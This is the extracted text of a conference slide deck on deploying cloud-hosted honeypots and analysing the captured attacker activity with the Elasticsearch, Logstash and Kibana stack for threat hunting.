SESSION ID:

#RSAC

Abhinav Singh

Cloud Servers, Honeypots & ELK-The Path To Attaining Cyber-Hunting Nirvana!

FLE1-F04

Security Researcher

@abhinavbom#malwaremustdie!

Presenter’s Company

Logo – replace on

master slide

#RSAC

Disclaimer

2

The views expressed in this presentation are my personal views and do not necessarily reflect views of my employer. They do not represent (nor are they intended to represent) the positions, opinions or policies of my employer or any other company or person. This presentation is not intended to make product or deployment recommendations.

Presenter’s Company

Logo – replace on

master slide

#RSAC

About Me

3

Security researcher. Speaker at Blackhat, Null, GroundZero etc.

Author– Metasploit Penetration testing Cookbook (1st & 2nd Ed.)

Udemy Course On Metasploit.

Linkedin.com/in/abhinavbom

@abhinavbom

@MalwareMustDie!

Presenter’s Company

Logo – replace on

master slide

#RSAC

AGENDA

4

Choosing and deploying your honeypots.

Cloud server instance(IaaS).

ELK stack (Elasticsearch, Logstash, Kibana).

Building intelligence.

Process, Patch and Hunt.

Conclusion.

Presenter’s Company

Logo – replace on

master slide

#RSAC

“Apply” Slide

5

Bullet point here (see slides 5 - 8 for instructions)

Bullet point here

Bullet point here

Varanasi, India

Presenter’s Company

Logo – replace on

master slide

#RSAC

Honeypots

6

A server/setup that is configured to detect an intruder by mirroring a real production system.

Isolated from the main network.

The intruder activities are monitored, captured and Stored.

Low and High Interaction.

Presenter’s Company

Logo – replace on

master slide

#RSAC

Brief History Of Honeypots

7

1990-1991: First studies released by Clifford Stoll (The Cuckoo’s egg) & Bill Cheswick (An Evening with Berferd).

1996-1997: Deception Toolkit introduced by Fred Cohen.

1998: First commercial honeypot CyberCop Sting released.

1999-2000: Honeynet project came into existence.

2001-2005: Honeypot research becomes mainstream.

Focus shifts from honeypots to mainstream threat detection technologies.

Presenter’s Company

Logo – replace on

master slide

#RSAC

Picking Your Honey!!

8

SSH: Kippo, Cowrie, Hornet.

Web Apps: Glastpof, Wordpot, ShockPot, Thug.

ICS/SCADA: Conpot, Gridpot.

Emails: Spambot, Spamhole.

Github.com/abhinavbom/awesome-honeypots

Presenter’s Company

Logo – replace on

master slide

#RSAC

Multi-pots Setup

9

T-pot (by T-Mobile) - http://dtag-dev-sec.github.io/mediator/feature/2015/03/17/concept.html

MHN (By ThreatStream) - https://github.com/threatstream/mhn

Presenter’s Company

Logo – replace on

master slide

#RSAC

Cloud Servers (IaaS)

10

Virtual cloud servers, similar to virtualization.

On demand computing resources.

Scalability, reliability, high up-time.

Pay for what you use.

Amazon web services, Google Cloud, digital Ocean etc.

Presenter’s Company

Logo – replace on

master slide

#RSAC

Basic Requirements and cost Estimation

11

50 GB storage.

2 GB RAM.

Preferably Linux environment.

Approximate cost of $10/month.

Presenter’s Company

Logo – replace on

master slide

#RSAC

Defining Security Groups

12

Presenter’s Company

Logo – replace on

master slide

#RSAC

ELK Stack

13

Store, Search &Analyze Collect, Enrich & Transport Explore, Visualize and Share

Presenter’s Company

Logo – replace on

master slide

#RSAC

Log Processing

14

Centralize data processing of all types.

Normalize varying schemas and formats.

Fast and convenient way for parsing the logs in a standardized manner.

https://www.elastic.co/products/logstash

Presenter’s Company

Logo – replace on

master slide

#RSAC

Defining Config file

15

Presenter’s Company

Logo – replace on

master slide

#RSAC

Manage Input Configuration

16

Presenter’s Company

Logo – replace on

master slide

#RSAC

Creating Filter Configurations

17

Presenter’s Company

Logo – replace on

master slide

#RSAC

Output Config

18

Presenter’s Company

Logo – replace on

master slide

#RSAC

19

Presenter’s Company

Logo – replace on

master slide

#RSAC

Search & Indexing - Elasticsearch

20

Search server based on Lucene.

Distributed, scalable, and highly available.

Schema free JSON, RESTful API.

Cross platform, open source.

https://www.elastic.co/products/elasticsearch

Presenter’s Company

Logo – replace on

master slide

#RSAC

Elasticsearch Architecture

21

Logstash.conf

Elasticsearch default web access

Elasticsearch.yaml

Presenter’s Company

Logo – replace on

master slide

#RSAC

Log Visualization with Kibana

22

Flexible analytics and visualization platform.

Real-time summary, charting and dashboard generation for streaming data.

Architectured to work with Elasticsearch.

https://www.elastic.co/products/kibana

Presenter’s Company

Logo – replace on

master slide

#RSAC

Configure Index Pattern

23

Presenter’s Company

Logo – replace on

master slide

#RSAC

24

Presenter’s Company

Logo – replace on

master slide

#RSAC

25

Log Source 1

Log Source 2

Log Source 3

Log Source 4

Presenter’s Company

Logo – replace on

master slide

#RSAC

Discovering attack patterns

26

BruteForce attempts.

Successful authentication.

Command executions.

Attacker GeoIP location.

File uploads.

Malicious Web requests.

Presenter’s Company

Logo – replace on

master slide

#RSAC

27

Presenter’s Company

Logo – replace on

master slide

#RSAC

28

Suspicious Command Executions

Presenter’s Company

Logo – replace on

master slide

#RSAC

Malware Downloads

29

Presenter’s Company

Logo – replace on

master slide

#RSAC

Analytics dashboard

30

Displays saved visualizations and queries in groups and charts.

Each visualization consists of resizable containers.

Interactive and detailed.

Presenter’s Company

Logo – replace on

master slide

#RSAC

Global Geo-IP tagging

31

Presenter’s Company

Logo – replace on

master slide

#RSAC

Credentials Dashboard

32

Presenter’s Company

Logo – replace on

master slide

#RSAC

Manual Insight based on Visual Data

33

Observing peaks and lows.

Location patterns.

Correlating Events from multiple sources.

OSINT.

Presenter’s Company

Logo – replace on

master slide

#RSAC

Ubnt:Ubnt

34

Default factory set password for Ubiquiti Networks appliances.

Product ranges from CCTV, VOIP, Routing etc.

http://www.extremetech.com/computing/205525-anonymous-may-have-hijacked-thousands-of-routers-for-zombie-botnet

Presenter’s Company

Logo – replace on

master slide

#RSAC

Top Command Executions

35

Something special about /tmp/.xs/…

http://blog.cari.net/carisirt-defaulting-on-passwords-part-1-r0_bot/

Presenter’s Company

Logo – replace on

master slide

#RSAC

Web Attacks

36

Trying Blind SQLi.

Unconditional redirects.

Malicious Command injections through web requests.

CMS plugin exploits(Wordpress, Joomla etc).

Presenter’s Company

Logo – replace on

master slide

#RSAC

Web attacks

37

Presenter’s Company

Logo – replace on

master slide

#RSAC

38

Presenter’s Company

Logo – replace on

master slide

#RSAC

Malware Downloads

39

Presenter’s Company

Logo – replace on

master slide

#RSAC

Attacking Your Own Honeypots

40

Mimic the frequent activities captured in your logs –Fingerprinting the fingerprints.

Scan(attack) your honeypot.

Detect leakage (based on your attacks).

Patch the code.

Presenter’s Company

Logo – replace on

master slide

#RSAC

41

Presenter’s Company

Logo – replace on

master slide

#RSAC

Fingerprinting the fingerprints

42

Presenter’s Company

Logo – replace on

master slide

#RSAC

Attack your honeypots and detect Leakage

43

Presenter’s Company

Logo – replace on

master slide

#RSAC

Patch The Code

44

Fork the project and add your modifications.

Open an incident for developer fixes(less reliable).

Randomize as much as possible.

See you at “The HoneyNet Project” - www.honeynet.org/project

#RSAC

Subhead if needed

Questions